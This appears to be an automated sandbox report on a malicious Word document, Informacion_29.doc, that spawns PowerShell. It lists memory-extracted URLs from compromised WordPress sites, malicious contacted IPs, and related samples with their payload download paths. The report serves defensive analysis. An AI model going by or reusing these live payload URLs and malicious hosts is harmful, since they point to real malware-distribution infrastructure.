                https://thebestfikrah.com/wp-content/uploads/2020/11/cropped-logo-tbf-1-1.pngpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.utipowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respondpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://wheelcomoving.com/wp-includes/wlwmanifest.xmlpowershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eapowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://ketoresetme.com/wp-content/uploads/2020/09/11.jpgpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://freejavporn.mobi/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                  high
                  http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/ea-style.css?ver=2powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wheelcomoving.com/services/powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://thebestfikrah.com/category/Treasure-Seerah/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wheelcomoving.com/wp-admin/admin-ajax.phppowershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://thebestfikrah.com/issues/articles-the-central-message/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://thebestfikrah.com/wp-content/plugins/easy-accordion-free/public/assets/css/font-awesome.min.cpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01.pngpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ketoresetme.com/author/admin/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ketoresetme.com/category/keto-summit/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://thebestfikrah.com/category/Islam-Today/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://thebestfikrah.com/wp-content/plugins/awsm-team/js/team.min.js?ver=1.2.1powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ketoresetme.com/2021/01/07/keto-full-day-of-eating-keto-bakes-biscuits-keto-chow/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.pngpowershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://thebestfikrah.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.krepowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.boldgrid.com/w3-total-cache/powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                    high
                    http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://ketoresetme.com/category/keto-news/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ketoresetme.com/xmlrpc.phppowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://00zyku.compowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    https://www.instagram.com/thebestfikrah/?hl=enpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                      high
                      https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpgpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://thebestfikrah.com/wp-content/plugins/wp-video-posts/js/wpvp-front-end.jspowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/third/lightbox.min.js?ver=2.0.2powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://rajwap.pro/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://wheelcomoving.com/company/contact/powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://phawayagency.compowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://thebestfikrah.com/wp-content/plugins/simple-download-monitor/css/sdm_wp_styles.css?ver=5.6powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ketoresetme.com/contact-us/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://stage.thebestfikrah.com/?s=powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      https://schema.orgpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                        high
                        http://thebestfikrah.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://thebestfikrah.com/wp-content/themes/oceanwp/assets/css/style.min.css?ver=2.0.2powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Bpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://thebestfikrah.com/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css?ver=5.2.4powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://arabysexy.mobi/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://schema.org/WPHeaderpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                          high
                          http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wppowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2217476466.0000000000394000.00000004.00000020.sdmpfalse
                            high
                            http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-stylpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://thebestfikrah.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://dirtyindianporn.info/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://thebestfikrah.com/xmlrpc.php?rsdpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.pngpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://wheelcomoving.com/services/ocean-cargo/powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?vpowershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ketoresetme.com/privacy-policy-2/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://thebestfikrah.com/about-us/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpgpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/css/frontend.mipowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://yoast.com/wordpress/plugins/seo/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                              high
                              https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://wheelcomoving.com/xmlrpc.php?rsdpowershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://indianpornmovies.info/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ketoresetme.com/category/keto/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://thebestfikrah.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend.minpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://thebestfikrah.com/wp-includes/wlwmanifest.xmlpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://wheelcomoving.com/company/powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://wheelcomoving.com/wp-content/themes/cargo/js/sliders.js?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ketoresetme.com/wp-content/uploads/2020/09/ttt.pngpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://wheelcomoving.com/wp-json/powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.%s.comPApowershell.exe, 00000005.00000002.2218306203.0000000002330000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              https://wp-statistics.com/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                high
                                http://thebestfikrah.com/wp-content/plugins/genesis-blocks/dist/blocks.style.build.css?ver=160989868powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ketoresetme.com/shop/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://twitter.com/thebestfikrahpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                  high
                                  https://d-cem.comppowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://schema.org/WebPagepowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                    high
                                    https://rajwap.me/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://thebestfikrah.com/wp-content/uploads/elementor/css/global.css?ver=1609897380powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://rycomputer.compowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://wheelcomoving.com/wp-content/themes/cargo/js/jquery.magnific-popup.min.js?ver=5.6powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/#respondpowershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://thebestfikrah.com/wp-content/themes/oceanwp/assets/js/main.min.js?ver=2.0.2powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ketoresetme.com/category/keto-diet/powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://thebestfikrah.com/solution/articles-the-central-message/powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.pngpowershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    66.85.46.76
                                    unknownUnited States
                                    393960HOST4GEEKS-LLCUStrue
                                    103.8.25.63
                                    unknownMalaysia
                                    132241SKSATECH1-MYSKSATECHNOLOGYSDNBHDMYtrue
                                    58.97.195.135
                                    unknownBangladesh
                                    7470TRUEINTERNET-AS-APTRUEINTERNETCoLtdTHtrue
                                    35.214.169.246
                                    unknownUnited States
                                    19527GOOGLE-2UStrue
                                    193.187.117.26
                                    unknownNetherlands
                                    55933CLOUDIE-AS-APCloudieLimitedHKtrue
                                    70.32.23.58
                                    unknownUnited States
                                    55293A2HOSTINGUStrue
                                    35.209.78.196
                                    unknownUnited States
                                    19527GOOGLE-2UStrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:336937
                                    Start date:07.01.2021
                                    Start time:11:46:12
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 5m 1s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Informacion_29.doc
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal96.troj.evad.winDOC@6/6@8/7
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 3
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .doc
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • Execution Graph export aborted for target powershell.exe, PID 2028 because it is empty
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:46:38API Interceptor1x Sleep call for process: msg.exe modified
                                    11:46:39API Interceptor460x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    66.85.46.76Informacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    1923620_YY-5094713.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    Doc 2912 75513.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    DAT.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    ARCHIVOFile_762-36284.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    4640-2912-122020.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    MENSAJE_29_2020.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    MENSAJE_29_2020.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    MENSAJE.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    Dati.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    ARCH.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    LIST_20201229_1397.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    documento 2912 2020.docGet hashmaliciousBrowse
                                    • wheelcomoving.com/p/RuMeRPa/
                                    35.214.169.246TZ8322852306TL.docGet hashmaliciousBrowse
                                      https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                        193.187.117.26Informacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                          1923620_YY-5094713.docGet hashmaliciousBrowse
                                            Doc 2912 75513.docGet hashmaliciousBrowse
                                              70.32.23.58Informacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                              • ketoresetme.com/wp-content/pmJ/
                                              1923620_YY-5094713.docGet hashmaliciousBrowse
                                              • ketoresetme.com/wp-content/pmJ/
                                              Doc 2912 75513.docGet hashmaliciousBrowse
                                              • ketoresetme.com/wp-content/pmJ/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              d-cem.comTZ8322852306TL.docGet hashmaliciousBrowse
                                              • 35.214.169.246
                                              https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                              • 35.214.169.246
                                              ketoresetme.comInformacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                              • 70.32.23.58
                                              1923620_YY-5094713.docGet hashmaliciousBrowse
                                              • 70.32.23.58
                                              Doc 2912 75513.docGet hashmaliciousBrowse
                                              • 70.32.23.58
                                              00zyku.comInformacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                              • 193.187.117.26
                                              1923620_YY-5094713.docGet hashmaliciousBrowse
                                              • 193.187.117.26
                                              Doc 2912 75513.docGet hashmaliciousBrowse
                                              • 193.187.117.26
                                              wheelcomoving.comInformacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              1923620_YY-5094713.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              Doc 2912 75513.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              DAT.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              ARCHIVOFile_762-36284.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              4640-2912-122020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              MENSAJE_29_2020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              MENSAJE_29_2020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              MENSAJE.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              Dati.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              ARCH.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              LIST_20201229_1397.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              documento 2912 2020.docGet hashmaliciousBrowse
                                              • 66.85.46.76

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              GOOGLE-2USform.docGet hashmaliciousBrowse
                                              • 35.214.199.246
                                              Nuevo pedido.exeGet hashmaliciousBrowse
                                              • 35.209.33.122
                                              Info_122020.docGet hashmaliciousBrowse
                                              • 35.208.84.24
                                              84-2020-98-6493170.docGet hashmaliciousBrowse
                                              • 35.208.104.82
                                              rib.exeGet hashmaliciousBrowse
                                              • 35.209.110.77
                                              rep_2020_12_29_N918980.docGet hashmaliciousBrowse
                                              • 35.208.69.64
                                              Adjunto.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              Messaggio-3012-2020.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              Documento-2912-122020.docGet hashmaliciousBrowse
                                              • 35.208.84.24
                                              Documento_I_2612.docGet hashmaliciousBrowse
                                              • 35.208.84.24
                                              Archivo-29.docGet hashmaliciousBrowse
                                              • 35.208.69.64
                                              1808_2020.docGet hashmaliciousBrowse
                                              • 35.208.84.24
                                              file 0113165085 323975.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              Inf 2020_12_30 FPJ6997.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              09648_2020.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              bijlagen 658.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              File 2020 RVT_724564.docGet hashmaliciousBrowse
                                              • 35.214.159.46
                                              09922748 2020 909_3553.docGet hashmaliciousBrowse
                                              • 35.208.84.24
                                              info-29-122020.docGet hashmaliciousBrowse
                                              • 35.208.84.24
                                              ARCHIVOFile-2020-IM-65448896.docGet hashmaliciousBrowse
                                              • 35.208.69.64
                                              TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH4WFF5Xwd2i.exeGet hashmaliciousBrowse
                                              • 171.100.142.238
                                              https://bit.ly/2RzqidD?needed=feltGet hashmaliciousBrowse
                                              • 110.170.129.101
                                              https://bit.ly/3iAFpzv?usually=girlGet hashmaliciousBrowse
                                              • 110.170.129.101
                                              https://bodyfitline.in/cgi-bin/x8ij-010/Get hashmaliciousBrowse
                                              • 119.76.191.158
                                              HOST4GEEKS-LLCUSInformacion_122020_EUH-4262717.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              1923620_YY-5094713.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              Doc 2912 75513.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              DAT.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              ARCHIVOFile_762-36284.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              4640-2912-122020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              MENSAJE_29_2020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              MENSAJE_29_2020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              MENSAJE.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              Dati.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              ARCH.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              LIST_20201229_1397.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              documento 2912 2020.docGet hashmaliciousBrowse
                                              • 66.85.46.76
                                              https://mysterygorillassafaris.com/notenotice/common/loginGet hashmaliciousBrowse
                                              • 185.221.216.3
